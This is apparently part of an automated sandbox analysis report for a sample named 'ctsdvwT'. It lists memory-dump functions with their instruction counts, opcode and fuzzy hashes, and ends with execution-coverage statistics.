                                        • API String ID:
                                        • Opcode ID: 7c071ebe12e892e4027d6612d79e442fb26a14d3c96366845bd7117b0a7d2411
                                        • Instruction ID: 9637679b98f28f7ad2439319c8c536e512c243a432bc52c6e4c635e25763f463
                                        • Opcode Fuzzy Hash: 7c071ebe12e892e4027d6612d79e442fb26a14d3c96366845bd7117b0a7d2411
                                        • Instruction Fuzzy Hash: 4F51D031A00205CFDB14DF78D5987EEBBF1AF49314F208469D10AEB761CB358845CB91
                                        Function 011B6CE6 Relevance: .1, Instructions: 134COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0a1babe2a318b35911bd7ebc6231720ac75ab32885da3b16b5a773c141109be6
                                        • Instruction ID: 4c4526f452bfd6f2a77bbaaf22e5bdd204f4831be09cd0e710b7a05c85af5f1f
                                        • Opcode Fuzzy Hash: 0a1babe2a318b35911bd7ebc6231720ac75ab32885da3b16b5a773c141109be6
                                        • Instruction Fuzzy Hash: A65104B4D002188FDB18CFA9C895BDDBBB1FF58314F148529E819BB390D778A844CB95
                                        Function 011B6CF0 Relevance: .1, Instructions: 132COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b355273a905418b363f3f531635a28054f88c5b4af3aed8da5aba0754eec5458
                                        • Instruction ID: b98791bf17b637724a80e56cae56de2a00edd20098bc24cf9be430cb598a8217
                                        • Opcode Fuzzy Hash: b355273a905418b363f3f531635a28054f88c5b4af3aed8da5aba0754eec5458
                                        • Instruction Fuzzy Hash: CB510474D102288FDB18CFA9C895BDDBBB1BF48314F148529E819BB391D778A844CF95
                                        Function 011B112A Relevance: .1, Instructions: 123COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: acdb11e2919b8accd66edcc0c8c9e7a6213792b7dd1f25d81a935ee5ad20772e
                                        • Instruction ID: 7ea6518d8ef7238150d2d20a32b71a1759eb65c31f46121066db92df936a8e6b
                                        • Opcode Fuzzy Hash: acdb11e2919b8accd66edcc0c8c9e7a6213792b7dd1f25d81a935ee5ad20772e
                                        • Instruction Fuzzy Hash: 74512131A0A249DFCB0AEF28FB819553FB5FB5930D3044966D1054FA3EDB246A49DF90
                                        Function 011B1138 Relevance: .1, Instructions: 112COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a2a8790bd97f7e8f89e69746d9729039942bfdb8dfe0657707f356ee3ee311a7
                                        • Instruction ID: a9159f8867b3426e232b9ff060507965a61ba7707739e33a20df55ee27986bf0
                                        • Opcode Fuzzy Hash: a2a8790bd97f7e8f89e69746d9729039942bfdb8dfe0657707f356ee3ee311a7
                                        • Instruction Fuzzy Hash: 4351FE30A0A2499FCB09FF28FB819553FB9FB5930D300496AD1055FA3EDB246A49DF90
                                        Function 011B1888 Relevance: .1, Instructions: 105COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ca27d485729e133cb5bc7f5863968b014bea6fc9574ab9b4825de4d7dd453a48
                                        • Instruction ID: bd9d9f754e8122fd8b82a93aa4d37069d91c3d8ef9fc324b5a84cc4c4c242acc
                                        • Opcode Fuzzy Hash: ca27d485729e133cb5bc7f5863968b014bea6fc9574ab9b4825de4d7dd453a48
                                        • Instruction Fuzzy Hash: 7D31D331B05205AFDB28EB74E5A46ED77B2BF89248F210869D505EB350EB35CD05CB91
                                        Function 011B26EC Relevance: .1, Instructions: 94COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cd163da6b0bcb490fa64f69010edc6367be06a7e4a41384dd18a41885c7a43ef
                                        • Instruction ID: 34d14bc0c47757684fcf539fdeb745f1b6f622575ca5603ca2f2d17d1bec1d49
                                        • Opcode Fuzzy Hash: cd163da6b0bcb490fa64f69010edc6367be06a7e4a41384dd18a41885c7a43ef
                                        • Instruction Fuzzy Hash: F141FEB1D003499FDB14DFA9C584ADEBFF5FF48310F248029E819AB254DB75A989CB90
                                        Function 011BED88 Relevance: .1, Instructions: 93COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d688ced0bfab108b327c130ff0e3a795eb7a71270c642689e28d3da3ddb5fbfb
                                        • Instruction ID: 8e99343acb5a422b3d67963fb20bd8757571701540407609872d292f992d9a70
                                        • Opcode Fuzzy Hash: d688ced0bfab108b327c130ff0e3a795eb7a71270c642689e28d3da3ddb5fbfb
                                        • Instruction Fuzzy Hash: 9431AF35E10215CBCB19CF69D4947EEBBF2AF89300F108919E806E7790DB70AC42CB50
                                        Function 011B50A8 Relevance: .1, Instructions: 90COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a6761a328437d4c0ebd2c30e5311fe24185c0e880ed281fcc04f955b0fee9261
                                        • Instruction ID: 6d5ab36584cf4b9cb54e1ef4f318f0f1602a7b1b5b38e4d34484d83f1b348692
                                        • Opcode Fuzzy Hash: a6761a328437d4c0ebd2c30e5311fe24185c0e880ed281fcc04f955b0fee9261
                                        • Instruction Fuzzy Hash: 67318E30B052159FDB69EF78C6A06ED77B3AF4D208F210469C805AB795DB36DD05CB90
                                        Function 011B16B0 Relevance: .1, Instructions: 90COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fa8fdc4f532389aa215e6231ba0f3dfc07a353c4219562f2ab9bc94288b87b87
                                        • Instruction ID: fef3c3582692d25980bbb30249e5cdc381cb25b6b0a56f155356124b5e7fe759
                                        • Opcode Fuzzy Hash: fa8fdc4f532389aa215e6231ba0f3dfc07a353c4219562f2ab9bc94288b87b87
                                        • Instruction Fuzzy Hash: 443120345000416FDF1B9B3CFAEC7E93B56EB59308F054966D009CB55AD768CC06CB52
                                        Function 011B26F8 Relevance: .1, Instructions: 90COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b791b0588aca4bc1bed0f3c839f1816dad904f2112758fdcd174fa396fd63e5b
                                        • Instruction ID: 840fbce4bec078f34e07fbeffeb89bdc2450f3169e9a6e4bd3aa99286b0bac0e
                                        • Opcode Fuzzy Hash: b791b0588aca4bc1bed0f3c839f1816dad904f2112758fdcd174fa396fd63e5b
                                        • Instruction Fuzzy Hash: 8641EDB4D002489FDB14DFA9C584ADEBFF5FF48310F24802AE809AB254DB75A949CB90
                                        Function 011B50B8 Relevance: .1, Instructions: 89COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ca5ac51efa59e7a590c5709f708ca0080675fa7a00b9882ed58c495d7e01d5db
                                        • Instruction ID: a83672d43acea0936ff32a913290393b5df86a9057f6a6f451da94847f2cdd0c
                                        • Opcode Fuzzy Hash: ca5ac51efa59e7a590c5709f708ca0080675fa7a00b9882ed58c495d7e01d5db
                                        • Instruction Fuzzy Hash: CE316F30B052099FDB59EB38CA906EE77B3AF4D208F210469D401AB794DF36DD05CB91
                                        Function 011BED98 Relevance: .1, Instructions: 86COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0c44fe5911f8d04a8d04ef33ea2bc2201453c0161d2a099b792ddfae591f5c24
                                        • Instruction ID: 9d8089cf93413f59046f274841e60b1b4d665da4b633b36c94a069e01f05e029
                                        • Opcode Fuzzy Hash: 0c44fe5911f8d04a8d04ef33ea2bc2201453c0161d2a099b792ddfae591f5c24
                                        • Instruction Fuzzy Hash: 12314C34E106159BDB19CF69D8946EEBBF2AF89300F108529E816E7390DB70AC46CB51
                                        Function 011B17D0 Relevance: .1, Instructions: 85COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 68b26e4e4c050ea0383e04620a9fc71c655b829ed6986960eb404f12d48994fe
                                        • Instruction ID: 45b8f1a6e125075887eb35333f3c87a8fe6dd9268f86d4078c81ef4cb06814ac
                                        • Opcode Fuzzy Hash: 68b26e4e4c050ea0383e04620a9fc71c655b829ed6986960eb404f12d48994fe
                                        • Instruction Fuzzy Hash: 69212B71F016416FDB256B7CA8983EA3BE6FB48358F150866E849C7385EB34C8418792
                                        Function 011B8D49 Relevance: .1, Instructions: 80COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3b6d015116d81d3efaaae45c0296294ee2de53eab5c4df2bab5bf81a8e1065de
                                        • Instruction ID: 7cfc3b8b4db6206af5e2cc14c2ce4dc574387168f4c87a15f7e5a72c928f633e
                                        • Opcode Fuzzy Hash: 3b6d015116d81d3efaaae45c0296294ee2de53eab5c4df2bab5bf81a8e1065de
                                        • Instruction Fuzzy Hash: 36316F74E0021A9FDB1ACF68D5806DEFBB6FF89304F10861AE805EB745DB719846CB91
                                        Function 011B8D58 Relevance: .1, Instructions: 78COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 05913a5d560ee45c23628446489cd9d52d8957182f3199652d2ad0a73c0c1494
                                        • Instruction ID: 1b2f32948c79dc7ddae7b6cc7da907d8a764b9faa7a570c54c6697f7533f7e28
                                        • Opcode Fuzzy Hash: 05913a5d560ee45c23628446489cd9d52d8957182f3199652d2ad0a73c0c1494
                                        • Instruction Fuzzy Hash: 1C217430E1021A9BDB19DF69D9846DEFBB6FF85704F10861AE805EB241DB709846CB91
                                        Function 011B1380 Relevance: .1, Instructions: 77COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 01fd684284b013543dfec59b93611cbd1f6958f3f6e67a8de2025726ec35ce60
                                        • Instruction ID: cfae5fa70a9e8eac6468e0dcb77d7c1458f9a9b1e3aae1f1cc7b31ecbcb17abd
                                        • Opcode Fuzzy Hash: 01fd684284b013543dfec59b93611cbd1f6958f3f6e67a8de2025726ec35ce60
                                        • Instruction Fuzzy Hash: 0921C570A052009FDB3A172CF9E87AD7B65EB06359F110D6AE40AC77D2EB2D8885C742
                                        Function 011B149A Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b9339f50a79e0d79479f27297c4eced7ac82943aa5d87120187862d5ec117a7f
                                        • Instruction ID: c5ee1195dbf829bf073b3cbd33e0e5db00ec170b8adf50a4fe08033274fec835
                                        • Opcode Fuzzy Hash: b9339f50a79e0d79479f27297c4eced7ac82943aa5d87120187862d5ec117a7f
                                        • Instruction Fuzzy Hash: 0721C931B002159FDB29AFBCA4A02EE7BF5EF59354F16047AE809E7341E735C8428791
                                        Function 011B8C48 Relevance: .1, Instructions: 73COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5529abaa7167cfdebbb0604b712331fe2c4820c8f7f57845894e064118638409
                                        • Instruction ID: e609e6e616e83faca1e21464b1d3b334a92e3a8118a1213145b1c1929035f96a
                                        • Opcode Fuzzy Hash: 5529abaa7167cfdebbb0604b712331fe2c4820c8f7f57845894e064118638409
                                        • Instruction Fuzzy Hash: D021A431E0060A9BDB1DCF74C4946DEFBB6AF89310F24861AE815F7790DBB09846CB51
                                        Function 00F5D01C Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230395368.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_f5d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 64fed43b41eeb17a060cf92ce7281ea6020bcf8d888225618d1fd557bf96e58c
                                        • Instruction ID: a170a27bc4efaeaf7a065c2e9666bea622809fcb4ff27f41d42c60597ce72354
                                        • Opcode Fuzzy Hash: 64fed43b41eeb17a060cf92ce7281ea6020bcf8d888225618d1fd557bf96e58c
                                        • Instruction Fuzzy Hash: DF21F571505204DFDB24DF24D5C4B16BF65FB84325F20C569DE0A4B39AC33AD80BEA62
                                        Function 011B1898 Relevance: .1, Instructions: 70COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 41089fe3ff1088dd5a791e77fce452dc8afeae803545b6aab8978859a98d4075
                                        • Instruction ID: eda6dcd46f7fcaff6098a76d9aaa2deb79856058450aaa12c2eca8132a3c4760
                                        • Opcode Fuzzy Hash: 41089fe3ff1088dd5a791e77fce452dc8afeae803545b6aab8978859a98d4075
                                        • Instruction Fuzzy Hash: AF216030B04249AFDB28DB78D6A56EE77F5AF89244F610468C406EB764EB31CD04CBA1
                                        Function 011B8C58 Relevance: .1, Instructions: 70COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0436b025f2534198063ac1e75b2771e826f035f0a5390778f60ca0f0db1feb8
                                        • Instruction ID: 13ff4254ed6fad8c75255daf4c7221f6f3d6b0dc334ae486594e37b5996910f9
                                        • Opcode Fuzzy Hash: a0436b025f2534198063ac1e75b2771e826f035f0a5390778f60ca0f0db1feb8
                                        • Instruction Fuzzy Hash: A0216270E0020A9BDB1DCFA8C4906DEB7B6AF89710F20851AE815F7350DBB09846CB91
                                        Function 011B16C0 Relevance: .1, Instructions: 69COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a46a7c8f0211332dc4f16b8ff13f20ec5f9e2d502a0df02fcd0398a7883ff42f
                                        • Instruction ID: 857695aff36d71e47f2785374d9f5c007793cc81abd74e3c86ecb8d3e546dc56
                                        • Opcode Fuzzy Hash: a46a7c8f0211332dc4f16b8ff13f20ec5f9e2d502a0df02fcd0398a7883ff42f
                                        • Instruction Fuzzy Hash: 692166386001015FDF16EB2CFAD4B5A379AEB49308F114922D00DC76AADB78DD458B91
                                        Function 011B0828 Relevance: .1, Instructions: 69COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 79a221786ddba4396f97a0fd72b2d573e5565c786a5e5b144fa55bb4f5c805c6
                                        • Instruction ID: 2d201f17f0f133f5807b484e0bc908613639071a66d9176966586f17c342e54d
                                        • Opcode Fuzzy Hash: 79a221786ddba4396f97a0fd72b2d573e5565c786a5e5b144fa55bb4f5c805c6
                                        • Instruction Fuzzy Hash: D511B430E053404FDF2A5A7899903AF3BB5EB4A214F15496BE046CF2A3DB19CA458BD1
                                        Function 011B4FA8 Relevance: .1, Instructions: 68COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 412a33b898e9d6cedc9a1809242b84ec48b8826680a6f9cfa3fc3dad658bdee0
                                        • Instruction ID: d9d2de6ed3bd85cef86d966046445ff19e2fa21d956f141f95cc364100498396
                                        • Opcode Fuzzy Hash: 412a33b898e9d6cedc9a1809242b84ec48b8826680a6f9cfa3fc3dad658bdee0
                                        • Instruction Fuzzy Hash: EC212C34700209DFDB58DB78D698AAE77F2AF4D204F2004A8E406EB361DB729D00CB91
                                        Function 011B0848 Relevance: .1, Instructions: 62COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e8e108b5e3a65a4680e7a39d745bbb180e16478a549718e5a610cbbe8746a4b6
                                        • Instruction ID: 6c980b1adf27a406805151c15b1d9027fee5073b682709d1d1d21ebd67bb49a4
                                        • Opcode Fuzzy Hash: e8e108b5e3a65a4680e7a39d745bbb180e16478a549718e5a610cbbe8746a4b6
                                        • Instruction Fuzzy Hash: B5118230F002044BEF695A7DD5947AF76A5EB4D254F104979F00ACF262DB65CE858BC1
                                        Function 00F5D005 Relevance: .1, Instructions: 62COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230395368.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_f5d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 53864572b7c61133590019717d56551bd8b4971df2f0885abe01d75578af1056
                                        • Instruction ID: 95f8faeeb420eb55686aec3206f8cef259fe31dfa18ec9fe40ae68f67f0a85fa
                                        • Opcode Fuzzy Hash: 53864572b7c61133590019717d56551bd8b4971df2f0885abe01d75578af1056
                                        • Instruction Fuzzy Hash: C9219F755093C08FDB12CF24D994715BF71EB46324F28C5EAD9498F2A7C33A980ADB62
                                        Function 011B14A8 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5e72cefbb8a459cc20ea06e777071a8a0b201db881b92ead4548008bc32cbca6
                                        • Instruction ID: 83b8ce73c94257821e59bf1124d19933ac00651e5187fc2bd18ff2d910fe7904
                                        • Opcode Fuzzy Hash: 5e72cefbb8a459cc20ea06e777071a8a0b201db881b92ead4548008bc32cbca6
                                        • Instruction Fuzzy Hash: BB018031B003159FCB29EFB894901EE7BF5EF49210B160479E80AE7241E735D8428BA2
                                        Function 011B9398 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b86e3f39798debff2212794f11eb71cb4456ae10606d167359d081804341320f
                                        • Instruction ID: b6cfc42a904abbac74a29ab72c51241e4ad62dbcf3d22dc8bdcde5de887dfc03
                                        • Opcode Fuzzy Hash: b86e3f39798debff2212794f11eb71cb4456ae10606d167359d081804341320f
                                        • Instruction Fuzzy Hash: C701B930A101088FDB04EF59E98478ABB75FF84314F548174D9085B29AD774E946C791
                                        Function 011B7BEA Relevance: .0, Instructions: 38COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2fdcf8473acdaef71b75f5003f3222fb8dd8ee3040317bf267f587b3ce45ba45
                                        • Instruction ID: 9c854c758bb7f7d5ba87ea6b4980d05e76a52a5ca233c5540a95f5291a19f451
                                        • Opcode Fuzzy Hash: 2fdcf8473acdaef71b75f5003f3222fb8dd8ee3040317bf267f587b3ce45ba45
                                        • Instruction Fuzzy Hash: F6012130940249AFCB16EFB4FF8598D7FB6EF45308F5046AAC0089B255DA355E09CB91
                                        Function 011B1534 Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ee0acc3f71a8a0f34450aad0a8d8c2856c53e4e934578b0d20017bacf4a36789
                                        • Instruction ID: 2a1967f525503f8aed191a6e1a6aa6b303161c6a4bdccd28580bfbb0ebad527e
                                        • Opcode Fuzzy Hash: ee0acc3f71a8a0f34450aad0a8d8c2856c53e4e934578b0d20017bacf4a36789
                                        • Instruction Fuzzy Hash: 78F02B73A04150DBD72A8BB8A8E01EC7F71EE6A11171F00D7D406DB252D325D402CB52
                                        Function 011B7BF8 Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 217b3f89d5240881f4962aeb72e1a341bd82829fba3680d72d877b93157b4b5d
                                        • Instruction ID: b8969d8eeb6f1e3ec9e800938a8b24bed0754f5020a9c25196c988a2a48442bd
                                        • Opcode Fuzzy Hash: 217b3f89d5240881f4962aeb72e1a341bd82829fba3680d72d877b93157b4b5d
                                        • Instruction Fuzzy Hash: 7BF03130940109EFCB0AFFB8FB8599D7BB9EF44308F504679C5089B259DB316E098B91

                                        Execution Graph

                                        Execution Coverage:11.5%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:341
                                        Total number of Limit Nodes:25
